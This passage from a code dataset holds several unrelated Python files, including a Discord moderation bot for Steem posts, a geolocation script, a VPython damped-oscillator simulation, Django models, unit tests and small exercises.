\"\"\"\n    # config_str: policy string, e.g. \"rand-m9-mstd0.5\"; hparams: optional dict of extra parameters\n    def __init__(self, config_str=\"rand-m9-mstd0.5\", hparams=None):\n        hparams = hparams if hparams is not None else {}\n        self.config_str = config_str\n        self.hparams = hparams\n\n    def __call__(self, imgs, labels, batch_info):\n        # convert each image to PIL, augment it, then return normalized tensors\n        ret_imgs = []\n        ret_labels = []\n        py_to_pil_op = vision.ToPIL()\n        to_tensor = vision.ToTensor()\n        normalize_op = vision.Normalize(IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD, is_hwc=False)\n        rand_augment_ops = transform_utils.rand_augment_transform(self.config_str, self.hparams)\n        for i, image in enumerate(imgs):\n            img_pil = py_to_pil_op(image)\n            img_pil = rand_augment_ops(img_pil)\n            img_array = to_tensor(img_pil)\n            img_array = normalize_op(img_array)\n            ret_imgs.append(img_array)\n            ret_labels.append(labels[i])\n        return np.array(ret_imgs), np.array(ret_labels)\n","sub_path":"research/cv/ISyNet/src/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"80211608","text":"\t# These are the dependencies. The bot depends on these to function, hence the name. 
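The RandAugment class in the record above is shaped for MindSpore's per-batch mapping: its __call__ signature (imgs, labels, batch_info) matches what per_batch_map passes in. A sketch of how it is typically wired up, where the dataset path and column names are assumptions:

import mindspore.dataset as ds

data = ds.ImageFolderDataset("/path/to/train", decode=True)  # hypothetical dataset location
data = data.batch(32, per_batch_map=RandAugment(), input_columns=["image", "label"])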
Please do not change these unless you're adding to them, because they can break the bot.\nimport discord\nimport asyncio\nimport datetime\nfrom steem import Steem\nfrom steem.post import Post\nfrom discord.ext.commands import Bot\nfrom discord.ext import commands\nfrom coinmarketcap import Market\nimport os\n\n# Here you can modify the bot's prefix and description and whether it sends help in direct messages or not. @client.command is strongly discouraged, edit your commands into the command() function instead.\nclient = Bot(description=\"Server-Management-Bot\", command_prefix='!', pm_help = True)\ns = Steem(nodes=[\"https://api.steemit.com\"])\nreact_dict = {}\ncmc = Market() # Coinmarketcap API call.\nbot_role = 'marshal' # Set a role for all of your bots here. You need to give them such a role on the discord server.\nste_usd = cmc.ticker(\"steem\", limit=\"3\", convert=\"USD\")[0].get(\"price_usd\", \"none\")\nsbd_usd = cmc.ticker(\"steem-dollars\", limit=\"3\", convert=\"USD\")[0].get(\"price_usd\", \"none\")\nbtc_usd = cmc.ticker(\"bitcoin\", limit=\"3\", convert=\"USD\")[0].get(\"price_usd\", \"none\")\n\nallowed_channels = ['387030201961545728', #community-review\n]\n\nmoderating_roles = ['developers', # Keep them lower case.\n'moderators']\n\nchannels_list = ['389762510779187200', #introduceyourself\n'389608804972756993', #steemit\n'389762038408282112', #bitcoin\n'389762302330535946', #cryptocurrency\n'389762891823316992', #blog\n'389761959014432778', #steem\n'389764215537270787', #crypto\n'389764282700660737', #health\n'389764314313129984', #science\n'389890366427627520', #technology\n'389890644551794688', #programming\n'389890578499764226', #tutorials\n'389764366456586240' #all_other\n]\n\ntag_list = ['introduceyourself',\n'steemit',\n'bitcoin',\n'cryptocurrency',\n'blog',\n'steem',\n'crypto',\n'health',\n'science',\n'technology',\n'programming',\n]\n\n#########################\n# DEFINE FUNCTIONS HERE #\n#########################\n\n # Used to run any commands. 
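# For instance, a hypothetical 'price' command could be wired in alongside the branches below:
#     elif command.startswith('price'):
#         await client.send_message(msg.channel, 'STEEM: $' + ste_usd)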
Add your custom commands here, each under a new elif command.startswith(name):.\nasync def command(msg,command):\n\tcommand = str(command)\n\tcommand = command[1:]\n\tif command.startswith('ping'):\n\t\tawait client.send_message(msg.channel,\":ping_pong: Pong!\")\n\telif command.startswith('users'):\n\t\tlist_of_users = []\n\t\tusers_online = client.get_all_members()\n\t\tfor member in users_online:\n\t\t\tlist_of_users.append(member.roles)\n\t\tawait client.send_message(msg.channel, \"There's \" + str(len(list_of_users)) + \" users online.\")\n\n\telif command.startswith('hey'):\n\t\tawait client.send_message(msg.channel, \"Hey, utopian!\")\n\t\n\telse:\n\t\tcommand_error = await client.send_message(msg.channel, \"Incorrect command.\")\n\t\tawait asyncio.sleep(6)\n\t\tawait client.delete_message(command_error)\n\n# Deletes posts in channel_list channels older than given hours.\nasync def del_old_mess(hours): \n\tcurrtime = datetime.datetime.now() - datetime.timedelta(hours=hours)\n\tchn = []\n\tfor x in client.get_all_channels():\n\t\tif x.id in channels_list:\n\t\t\tchn.append(x)\n\tfor x in chn:\n\t\tasync for y in client.logs_from(x,limit=100,before=currtime):\n\t\t\tawait client.delete_message(y)\n\nasync def payout(total,sbd,ste):\n\ttotal = float(total) * 0.8 # Currator cut, anywhere between 0.85 and 0.75.\n\ttotalsbd = str(total * 0.5 * float(sbd))[:6]\n\ttotalsp = total * 0.5 * float(ste)\n\ttotalsp = str(totalsp * 1/float(ste))[:6] # SBD is always worth 1$ in the steem blockchain, so price of SBD to price of STE is always 1/STE.\n\tpayout = str(float(totalsbd) + float(totalsp))[:6]\n\treturn payout\n\nasync def get_info(msg):\n\tlink = str(msg.content).split(' ')[0]\n\tp = Post(link.split('@')[1])\n\tif check_age(p,2,48):\n\t\tembed=discord.Embed(color=0xe3b13c)\n\t\tembed.add_field(name=\"Title\", value=str(p.title), inline=False)\n\t\tembed.add_field(name=\"Author\", value=str(\"@\"+p.author), inline=True)\n\t\tembed.add_field(name=\"Nominator\", value=str('<@'+ msg.author.id +'>'), inline=True)\n\t\tembed.add_field(name=\"Age\", value=str(p.time_elapsed())[:-10] +\" hours\", inline=False)\n\t\tembed.add_field(name=\"Payout\", value=str(p.reward), inline=True)\n\t\tembed.add_field(name=\"Payout in USD\", value=await payout(p.reward,sbd_usd,ste_usd), inline=True)\n\t\tembed.set_footer(text=\"Marshal - a Steem bot by Vctr#5566 (@jestemkioskiem)\")\n\t\treturn embed\n\telse:\n\t\tage_error = await client.send_message(msg.channel, 'Your post has to be between 2h and 48h old.')\n\t\tawait client.delete_message(msg)\n\t\tawait asyncio.sleep(6)\n\t\tawait client.delete_message(age_error)\n\n# Used to authorize posts and sort them into correct channels.\nasync def authorize_post(msg, user): \n\tmsg_tag = msg.content.split('/')[3]\n\tp = Post(msg.content.split('@')[1])\n\n\tif check_age(p,2,48):\n\t\tawait client.delete_message(msg)\n\n\t\tif msg_tag in tag_list: # Sorting the item into a correct channel\n\t\t\tdest_channel = tag_list.index(msg_tag)\n\t\telse:\n\t\t\tdest_channel = len(tag_list)\n\n\t\tprint(msg)\n\t\tembed = await get_info(msg)\n\t\tawait client.send_message(client.get_channel(channels_list[dest_channel]), content=msg.content)\n\t\tawait client.send_message(client.get_channel(channels_list[dest_channel]), embed=embed) # Target channel & message for accepted posts.\n\t\tawait client.send_message(client.get_channel(channels_list[dest_channel]), content=\"This post was accepted by <@\" + user.id + \">\" )\n\t\t\t\n\n# Returns true if the post's age is between two 
hour bounds.\ndef check_age(post, low, high):\n\t# True when the post is older than 'low' hours and younger than 'high' hours.\n\treturn datetime.timedelta(hours=low) < post.time_elapsed() < datetime.timedelta(hours=high)\n\n# Returns true if message's author has a moderating_roles role.\ndef is_mod(user):\n\tauth_roles = [x.name.lower() for x in user.roles]\n\t# any() checks every moderating role; the old loop returned on the first mismatch.\n\treturn any(x in auth_roles for x in moderating_roles)\n\n######################\n# DEFINE EVENTS HERE #\n######################\n\n@client.event\nasync def on_ready():\n\tprint('\\nInvite link: https://discordapp.com/oauth2/authorize?client_id={}&scope=bot&permissions=8'.format(client.user.id))\n\tprint('--------')\n\tprint('Server-Management-Bot was built by Vctr#5566')\n\tprint('Steemit profile: https://steemit.com/@jestemkioskiem')\n\n\n# This is our event check. For simplicity's sake, everything happens here. You may add your own events, but commands are discouraged; for those, edit the command() function instead.\n@client.event\nasync def on_message(message):\n\tste_usd = cmc.ticker(\"steem\", limit=\"3\", convert=\"USD\")[0].get(\"price_usd\", \"none\")\n\tsbd_usd = cmc.ticker(\"steem-dollars\", limit=\"3\", convert=\"USD\")[0].get(\"price_usd\", \"none\")\n\tbtc_usd = cmc.ticker(\"bitcoin\", limit=\"3\", convert=\"USD\")[0].get(\"price_usd\", \"none\")\n\tawait del_old_mess(132)\n\n\tif message.content.startswith(client.command_prefix): # Setting up commands. You can add new commands in the command() function at the top of the code.\n\t\tawait command(message, message.content)\n\n\telif bot_role not in [y.name.lower() for y in message.author.roles] and message.channel.id in allowed_channels: # Checking if the poster wasn't the bot and if it was in one of the monitored channels.\n\t\tif message.content.startswith('https://steemit.com') or message.content.startswith('https://busy.org'):\n\t\t\tembed = await get_info(message)\n\t\t\tbotmsg = await client.send_message(message.channel, embed=embed)\n\t\t\treact_dict[message.id] = botmsg.id\n\n\t\telse:\n\t\t\tif not is_mod(message.author):\n\t\t\t\tawait client.delete_message(message)\n\t\t\t\tlink_error = await client.send_message(message.channel, content='@' + str(message.author) + ' Your link has to start with \"https://steemit.com\" or \"https://busy.org\"')\n\t\t\t\tawait asyncio.sleep(6)\n\t\t\t\tawait client.delete_message(link_error)\n\n@client.event\nasync def on_reaction_add(reaction, user):\n\tif is_mod(user):\n\t\tif reaction.emoji == '☑':\n\t\t\tawait authorize_post(reaction.message, user)\n\t\t\tbotmsg = await client.get_message(reaction.message.channel, react_dict[reaction.message.id])\n\t\t\tawait client.delete_message(botmsg)\n\nif __name__ == '__main__': # Starting the bot.\n\tclient.run(os.getenv('TOKEN'))\n","sub_path":"marshal.py","file_name":"marshal.py","file_ext":"py","file_size_in_byte":8001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"251853924","text":"arr = [8, 7, 2, 5, 3, 1]\r\ntarget = 10\r\narr = sorted(arr)\r\nr = len(arr)-1\r\nl = 0\r\noutput = []\r\nwhile l < r:\r\n    pair_sum = arr[l] + arr[r]  # renamed from 'sum', which shadowed the builtin\r\n    if pair_sum == target:\r\n        output.append(arr[l])\r\n        output.append(arr[r])\r\n        break\r\n    elif pair_sum > target:\r\n        r -= 1\r\n    else:\r\n        l += 1\r\n\r\nif not output:\r\n    print(\"Pair not found\")\r\nelse:\r\n    print(\"pair found \", 
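# The loop above is the classic two-pointer pair search on a sorted array: when the running
# sum overshoots the target the right pointer moves in, when it undershoots the left moves out.
# Trace for the sorted input [1, 2, 3, 5, 7, 8] with target 10: 1+8=9 -> l += 1; 2+8=10 -> found.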
tuple(output))","sub_path":"array_01_sum.py","file_name":"array_01_sum.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299404338","text":"from geopy.geocoders import Nominatim\nimport json\nimport sys\nimport os\nimport overpy\nimport numpy as np\nfrom geopy import distance\n\n#if road name is not available => search for closest street\n#search in a radius\ndef searchForStreet(radius):\n \n query_test = \"\"\"way(around:\"\"\" + str(radius)+ ',' + str(lat) + \",\" + str(long) + \"\"\");out;\"\"\"\n result_test = api.query(query_test)\n test_way = result_test.ways[0]\n test_nodes = test_way.get_nodes(resolve_missing=True)\n location = geolocator.reverse(str(test_nodes[0].lat) + ',' + str(test_nodes[0].lon)) #zoom=16\n return location\n\n\nlat = sys.argv[1]\nlong = sys.argv[2]\nlat = float(lat)\nlong = float(long)\n\nlatlong_str = str(lat) + ', ' + str(long)\ngeolocator = Nominatim(user_agent=\"SV4VILoc\")\nlocation = geolocator.reverse(latlong_str) #zoom=16\nprint(location.raw)\nloc_addr = location.raw \n\n\nif 'road' not in loc_addr['address']:\n\n output_string = 'Leider konnte keine Straße gefunden werden'\n search_string = 'Suche in 50m Radius nach Straße'\n\n print(output_string)\n print(search_string)\n \n radius = 50.0\n loc = searchForStreet(radius)\n #if loc empty!\n print(location.raw[\"display_name\"])\n print('On google maps: ')\n maps_string = 'http://www.google.com/maps/place/' + str(lat) + ',' + str(long)\n print(maps_string)\n exit()\n \n \n \nif 'house_number' not in loc_addr['address']:\n output_string = 'Du befindest dich in der ' + loc_addr[\"address\"][\"road\"] + ' Straße'\nelse:\n output_string = 'Du befindest dich in der ' + loc_addr[\"address\"][\"road\"] + ' Straße Nummer ' + loc_addr[\"address\"][\"house_number\"]\n\nprint(output_string)\n\nroad_name = loc_addr[\"address\"][\"road\"]\n\nlat_s = round(lat,1) - 0.1\nlong_s = round(long,1) - 0.1\n\nlat_l = round(lat,1) + 0.1\nlong_l = round(long,1) + 0.1\n\nbbox_string = '(' + str(lat_s) + ',' + str(long_s) + ',' + str(lat_l) + ',' + str(long_l) + ')'\n\n\nquery_string = \"\"\"way[\"name\"=\"\"\" + road_name + \"]\"+bbox_string+\";out;\"\"\"\nprint(query_string)\n\napi = overpy.Overpass()\nresult = api.query(query_string)\n\nway = result.ways[0]\nnodes = way.get_nodes(resolve_missing=True)\n\n\n#possible accuracy => if 10 nodes in street (evenly spaced?????) then node 2 is 20%!\nstreet_perc = 1.0/len(nodes)\n\n\ncur_pos = (lat, long)\n\ndist = 100000000\ns_pos = -1\n\nfor pos in range(0,len(nodes)):\n \n node_pos = (nodes[pos].lat, nodes[pos].lon)\n c_dist = distance.distance(cur_pos, node_pos).km\n if(dist > c_dist):\n dist = c_dist\n s_pos = pos\n \nperc = int((street_perc * s_pos) * 100)\n\nprint('Du hast die Strasse zu %i prozent passiert' %perc)\n\nprint('On google maps: ')\nmaps_string = 'http://www.google.com/maps/place/' + str(lat) + ',' + str(long)\nprint(maps_string)\n","sub_path":"ICG/gps2name.py","file_name":"gps2name.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"309305923","text":"\"\"\"\n VPython教學: 8-2.簡諧運動, 有阻尼\n 日期: 2018/2/25\n 作者: 王一哲\n\"\"\"\nfrom vpython import *\n\n\"\"\"\n 1. 
參數設定, 設定變數及初始值\n\"\"\"\nm = 4 # 木塊質量 4 kg\nsize = 1 # 木塊邊長 1 m\nR = 5 # 振幅 5 m\nk = 1 # 彈性常數 1 N/m\nL0 = R + size # 彈簧原長\nb = 1 # 阻尼 f = -bv, overdamped: b^2 > 4mk, critical damping: b^2 = 4mk, underdamped: b^2 < 4mk\nT = 2*pi*sqrt(m/k) # 週期理論值\ni = 0 # 木塊運動經過的週期次數\nt = 0 # 時間\ndt = 0.001 # 時間間隔\n\n\"\"\"\n 2. 畫面設定\n (1) 用 canvas 物件作為顯示動畫用的視窗 http://www.glowscript.org/docs/VPythonDocs/canvas.html\n (2) 用 box 物件產生地板、牆壁、木塊 http://www.glowscript.org/docs/VPythonDocs/box.html\n (3) 用 helix 物件產生彈簧 http://www.glowscript.org/docs/VPythonDocs/helix.html\n (4) 用 arrow 物件產生表示速度、加速度用的箭頭 http://www.glowscript.org/docs/VPythonDocs/arrow.html\n (5) 用 graph 產生繪圖視窗 http://www.glowscript.org/docs/VPythonDocs/graph.html\n\"\"\"\n# 產生動畫視窗、地板、木塊、彈簧\nscene = canvas(title = \"Simple Harmonic Motion\", width = 800, height = 400, x = 0, y = 0, background = vector(0, 0.6, 0.6))\nfloor = box(pos = vector(0, -(size+0.1)/2, 0), length = R+L0+2, height = 0.1, width = R, texture = textures.metal)\nwall = box(pos = vector(-L0, 0, 0), length = 0.1, height = size, width = R, texture = textures.metal)\nblock = box(pos = vector(R+size/2, 0, 0), length = size, height = size, width = size, texture = textures.wood)\nblock.v = vector(0, 0, 0)\nspring = helix(pos = vector(-L0, 0, 0), radius = 0.3*size, thickness = 0.05*size, color = color.yellow)\nspring.axis = block.pos - spring.pos - vector(size/2, 0, 0)\n# 產生表示速度、加速度的箭頭\narrow_v = arrow(pos = block.pos + vector(0, size, 0), axis = vector(0, 0, 0), shaftwidth = 0.3*size, color = color.green)\narrow_a = arrow(pos = block.pos + vector(0, 2*size, 0), axis = vector(0, 0, 0), shaftwidth = 0.3*size, color = color.magenta)\n# 繪圖部分\ngd = graph(title = \"plot\", width = 600, height = 450, x = 0, y = 400, xtitle = \"t(s)\", \\\n ytitle = \"blue: x(m), green: v(m/s), magenta: a(m/s^2)\")\nxt = gcurve(graph = gd, color = color.blue)\nvt = gcurve(graph = gd, color = color.green)\nat = gcurve(graph = gd, color = color.magenta)\n\n\"\"\"\n 3. 
物體運動部分, 重覆5個週期\n\"\"\"\nvp = block.v.x\nwhile(i < 5 and t < 5*T):\n rate(1000)\n# 計算彈簧長度、伸長量、回復力\n spring.axis = block.pos - spring.pos - vector(size/2, 0, 0)\n F = -k * (spring.axis - vector(L0, 0, 0)) - b * block.v\n# 計算木塊加速度, 更新速度、位置\n block.a = F/m\n block.v += block.a*dt\n block.pos += block.v*dt\n# 更新代表速度、加速度的箭頭位置、方向、長度\n arrow_v.pos = block.pos + vector(0, size, 0)\n arrow_a.pos = block.pos + vector(0, 2*size, 0)\n arrow_v.axis = block.v\n arrow_a.axis = block.a\n# 畫出 x-t, v-t, a-t 圖\n xt.plot(pos = (t, block.pos.x - size/2))\n vt.plot(pos = (t, block.v.x))\n at.plot(pos = (t, block.a.x))\n# 判斷木塊是否經過一個週期\n vc = block.v.x\n if(vp > 0 and vc < 0):\n i += 1\n print(i, t)\n vp = vc\n# 更新時間\n t += dt\n","sub_path":"08.簡諧運動/8-2_SHM_damp.py","file_name":"8-2_SHM_damp.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"113238626","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom PIL import Image\nfrom django.conf import settings\nimport os\nimport shutil\n# Create your models here.\n\nDEFAULT_FORMAT = \".jpg\"\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n head = models.CharField(max_length = 100)\n head160 = models.ImageField(upload_to=\"head_img\",null=True,blank=True)\n create_time = models.DateField(auto_now = True,auto_now_add = False)\n note = models.URLField()\n address = models.TextField()\n resume = models.TextField()\n\n def save(self,*args,**kargs): \n super(UserProfile, self).save(*args,**kargs)\n if not self.head160:\n return\n pw = self.head160.width\n ph = self.head160.height\n\n #extention = os.path.splitext(self.head)[1]\n path = settings.MEDIA_ROOT + \"head_img/\" + str(self.user.id) + \"_160\" + DEFAULT_FORMAT\n thumbnail_path = settings.MEDIA_ROOT + \"head_img/\" + str(self.user.id) + \"_48\" + DEFAULT_FORMAT\n if pw > 48 or ph > 48:\n pw = 48\n ph = 48\n else :\n shutil.copy2(path, thumbnail_path) \n return\n\n image = Image.open(path)\n thumbnail = image.thumbnail((pw,ph),Image.ANTIALIAS)\n image.save(thumbnail_path,\"jpeg\")\n\n\n def save_without_img(self,*args,**kargs):\n super(UserProfile, self).save(*args,**kargs)\n\n\nclass PublicNotif(models.Model):\n content = models.TextField()\n def __unicode__(self):\n return self.content\n\nclass UserMessage(models.Model):\n user = models.ForeignKey(User)\n message_kind = models.IntegerField()\n detail_id = models.IntegerField()\n isviewed = models.BooleanField()\n\nclass UserCollect(models.Model):\n user = models.ForeignKey(User)\n message_kind = models.IntegerField()\n detail_id = models.IntegerField()\n","sub_path":"chuxin/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"182256621","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport unittest\n\nimport logging\n\nimport sqlalchemy\n\nfrom main.settings import set_config\nset_config('test')\n\nfrom .base import _Base\nfrom main.models.ml import (\n MLModel, ModelLog, RequestLog, PredictionScore,\n QuestionType\n)\nfrom main.models.data import Image, Question\n\nlogging.disable(logging.CRITICAL)\n\nSAMPLE_TEXT = 'sample text'\n\n\nclass MLModelTest(_Base):\n\n def test_model_type_save_and_query(self):\n model_name = 'test_model'\n with self.assertRaises(ModuleNotFoundError):\n model = MLModel(name=model_name,\n type='cls',\n category='test',\n 
module='invalid_module',\n object='Class')\n model.save()\n\n model = MLModel(name=model_name,\n type='cls',\n category='question_type',\n module='main.ml',\n object='Class')\n model.save()\n\n data = MLModel.query().first()\n\n self.assertEqual(data.id, model.id)\n self.assertEqual(data.name, model_name)\n\n def test_model_type_choice_field_work(self):\n model_name = 'test_model'\n model = MLModel(name=model_name,\n type='cls',\n category='question_type',\n module='main.ml',\n object='Class')\n model.save()\n\n data = MLModel.get(model.id)\n self.assertEqual(data.type, 'classification')\n\n def test_check_unique_name_with_handling_error(self):\n model_name = 'test_model'\n cat = 'question_type'\n model = MLModel(name=model_name,\n type='cls',\n category=cat,\n module='main.ml',\n object='Class')\n model.save()\n\n model2 = MLModel(name=model_name,\n type='seq',\n category='what',\n module='main.ml',\n object='Class')\n\n with self.assertRaises(Exception):\n with self.assertLogs(level=logging.ERROR):\n model2.save()\n\n data = MLModel.query().filter_by(name=model_name).first()\n self.assertEqual(data.category, cat)\n\n with self.assertRaises(ValueError):\n MLModel(name='invalid_type',\n type='incalid',\n category=cat,\n module='main.ml',\n object='Class')\n\n\n def test_update_score_data(self):\n new_score = 0.68\n model = MLModel(name='test_model',\n type='cls',\n category='question_type',\n module='main.ml',\n object='Class',\n metrics='validation_accuracy',\n score=0.65)\n\n model.update_score(score=new_score)\n\n data = MLModel.query().first()\n self.assertEqual(data.score, new_score)\n\n\nclass ModelLogTest(_Base):\n\n def test_model_log_saved(self):\n log = ModelLog(log_type='success', log_text=SAMPLE_TEXT)\n\n log.save()\n\n data = ModelLog.query() \\\n .filter_by(log_text=SAMPLE_TEXT) \\\n .first()\n\n self.assertEqual(data.log_text, SAMPLE_TEXT)\n\n\nclass RequestLogTest(_Base):\n\n def setUp(self):\n super(RequestLogTest, self).setUp()\n\n self.qtype = QuestionType(type='testcase')\n self.qtype.save()\n\n q = Question(question='is this test')\n q.save()\n self.question_id = q.id\n\n img = Image(filename='test.jpg')\n img.save()\n self.img_id = img.id\n\n def test_serialize_data_as_dict(self):\n log = RequestLog(\n question_type_id=self.qtype.id,\n question_id=self.question_id,\n image_id=self.img_id,\n log_type='success',\n log_text=SAMPLE_TEXT)\n\n log.save()\n\n # check if properly saved\n log = RequestLog.query().first()\n self.assertEqual(log.log_text, SAMPLE_TEXT)\n\n data = log.to_dict()\n\n self.assertEqual(data['id'], log.id)\n self.assertEqual(data['question_type_id'], self.qtype.id)\n self.assertEqual(data['log_type'], 'success')\n self.assertEqual(data['log_text'], SAMPLE_TEXT)\n self.assertEqual(data['image_id'], self.img_id)\n\n # not stored and check if it can handle empty data\n self.assertIsNone(data['model_id'])\n\n\nclass PredictionScoreTest(_Base):\n\n def setUp(self):\n super(PredictionScoreTest, self).setUp()\n\n self.qtype = QuestionType(type='testcase')\n self.qtype.save()\n\n q = Question(question='is this test')\n q.save()\n self.question_id = q.id\n\n img = Image(filename='test.jpg')\n img.save()\n self.img_id = img.id\n\n self.test_predict = 'some result'\n log = RequestLog(\n question_type=self.qtype,\n question_id=self.question_id,\n image_id=self.img_id,\n log_type='success',\n log_text=SAMPLE_TEXT)\n log.save()\n\n pred = PredictionScore(prediction=self.test_predict,\n log=log,\n rate=1)\n pred.save()\n self.id = pred.id\n self.req_log = log\n\n def 
test_model_saved_properly(self):\n data = PredictionScore.get(self.id)\n\n # check saved properly\n self.assertEqual(data.prediction, self.test_predict)\n\n # check make relationship with log\n self.assertEqual(data.log.log_text, SAMPLE_TEXT)\n\n # fail if rate is too high or low\n with self.assertRaises(ValueError):\n PredictionScore(prediction='invalid',\n log=self.req_log,\n rate=10)\n\n with self.assertRaises(ValueError):\n PredictionScore(prediction='invalid',\n log=self.req_log,\n rate=0)\n\n def test_update_score_information(self):\n data = PredictionScore.get(self.id)\n\n with self.assertRaises(ValueError):\n data.update()\n\n target = 'validated'\n data.update(question_type='updated', answer=target)\n\n new_data = PredictionScore.get(self.id)\n self.assertEqual(new_data.answer, target)\n\n\nclass QuestionTypeModelTest(_Base):\n\n def test_question_model_save_and_query(self):\n test = 'test type'\n qt = QuestionType(type=test)\n qt.save()\n\n data = QuestionType.query().filter_by(type=test).first()\n self.assertEqual(data.type, test)\n self.assertEqual(data.type, qt.type)\n init_size = QuestionType.query().count()\n\n # not saved model which violated unique constraints\n error_model = QuestionType(type=test)\n with self.assertRaises(Exception):\n with self.assertLogs(level=logging.ERROR):\n error_model.save()\n\n self.assertEqual(\n QuestionType.query().count(),\n init_size\n )\n\n def test_register_question_type(self):\n test = 'test type'\n QuestionType.register(test)\n\n data = QuestionType.query().first()\n self.assertEqual(data.type, test)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/models/test_ml.py","file_name":"test_ml.py","file_ext":"py","file_size_in_byte":7414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"124252804","text":"import random\n\nclass Game:\n check = None\n score = 0\n heads_n_tails_answer = [\"heads\", \"tails\", ]\n higher_or_lower_score = []\n higher_or_lower_answer = None\n\n def __init__(self):\n self.check = True\n print(\"~~ Heads'n'Tails / Higher or Lower ~~\")\n print(\" /////////////////////////////////// \")\n\n @staticmethod\n def menu():\n print(\"Choose what you want to play:\\n\"\n \"1. Heads and Tails\\n\"\n \"2. Higher or Lower\\n\"\n \"3. Exit\")\n\n def menu_choice(self):\n self.check = True\n while self.check:\n switch = input(self.menu())\n if switch == '1':\n return self.heads_n_tails()\n elif switch == '2':\n return self.higher_or_lower()\n elif switch == '3':\n exit()\n else:\n self.check = False\n\n def heads_n_tails(self):\n self.check = True\n while self.check:\n answer = input(\"What am I thinking about Heads or Tails?\\n$\")\n if \"\".join(answer).lower() == self.heads_n_tails_answer[random.randint(0, 1)]:\n self.score += 1\n print(\"Good answer\")\n else:\n print(\"Wrong answer :(\")\n answer = input(\"Try again? [T/N]\")\n if \"\".join(answer).upper() == \"N\":\n return self.menu_choice()\n\n def higher_or_lower(self):\n number = 50\n self.check = True\n while self.check:\n print(\"What number from 0 to {} I've picked?\".format(number))\n my_pick = random.randint(0, number)\n for i in range(0, 11):\n answer = input(\"You have {} guesses.\\n\".format(10-i))\n if int(answer) > my_pick:\n print(\"Lower!\")\n elif int(answer) < my_pick:\n print(\"Higher!\")\n else:\n print(\"Yea it's {}\".format(answer))\n break\n\n answer = input(\"Try again? 
[T/N]\")\n            if \"\".join(answer).upper() == \"N\":\n                return self.menu_choice()\n            number += 50\n\n\ngame = Game()\n\ngame.menu_choice()\n","sub_path":"mini_game.py","file_name":"mini_game.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"145905471","text":"#############################################\n# CIE IGCSE CS Paper 2\n# June 2015 0478/21\n#\n# Sample Answer by Mr Farren\n#\n#Task 1:\n# A data logger records the temperature on the roof of a school twice a day, at midday and midnight.\n# Input and store the temperatures recorded for a month. You must store the temperatures in two one-dimensional\n# arrays, one for the midday temperatures and one for the midnight temperatures. All the\n# temperatures must be validated on entry and any invalid temperatures rejected. You must decide your\n# own validation rules. You may assume that there are 30 days in a month.\n\n#Define variables and constants\nDAYS = 5 # use 30 for a full month; kept small here for testing\nmiddayTemp = []\nmidnightTemp = []\ntemperature = 0\nday = 0\n\nfor day in range(0, DAYS):\n    invalid = True\n    while invalid:\n        temperature = float(input(\"Enter midday temperature: \"))\n        if temperature < -10.0:\n            print(\"Out of range - too low\")\n        elif temperature > 60.0:\n            print(\"Out of range - too high\")\n        else:\n            middayTemp.append(temperature)\n            invalid = False\n    invalid = True\n    while invalid:\n        temperature = float(input(\"Enter midnight temperature: \"))\n        if temperature < -10.0:\n            print(\"Out of range - too low\")\n        elif temperature > 60.0:\n            print(\"Out of range - too high\")\n        else:\n            midnightTemp.append(temperature)\n            invalid = False\nprint(\"Midday Temps:\", middayTemp) # For debugging, to check that values were entered\nprint(\"Midnight Temps:\", midnightTemp)\n\n#Task 2:\n#-------------------------\n\n#set initial variables\nmiddayTotal = 0.0\nmidnightTotal = 0.0\n\n# Get sum of all temps\nfor i in range(0, DAYS):\n    middayTotal = middayTotal + middayTemp[i]\n    midnightTotal = midnightTotal + midnightTemp[i]\n\n# Calculate the average\nmiddayAverage = middayTotal / DAYS # Divide by number of days\nmidnightAverage = midnightTotal / DAYS\n\n#Output results to display with suitable prompts and formatting\nprint(\"Average midday temperature: %.1f\" % middayAverage) # Produces a string output formatted to one decimal place\nprint(\"Average midnight temperature: %.1f\" % midnightAverage)\nprint(middayAverage)\nprint(midnightAverage)","sub_path":"paper2_tasks/2015-2.1/MrF/Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"639135470","text":"import sys\r\nimport qdarkstyle\r\nfrom PyQt5.QtWidgets import QDialog, QApplication\r\nfrom MyFirstUI import Ui_Form # MyFirstUI is the name of your generated .py UI file\r\n\r\nclass AppWindow(QDialog):\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.ui = Ui_Form()\r\n        self.ui.setupUi(self)\r\n        self.show()\r\n\r\napp = QApplication(sys.argv)\r\napp.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\r\nw = AppWindow()\r\nw.show()\r\nsys.exit(app.exec_())","sub_path":"主程式-股價/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"377122724","text":"from django.conf.urls import url\n\nfrom .views import (\n\tPositionListView,\n\tPositionDetailView,\n\tPositionCreateView,\n\tPositionUpdateView\n\t)\n\nurlpatterns = [\n\turl(r'^$', 
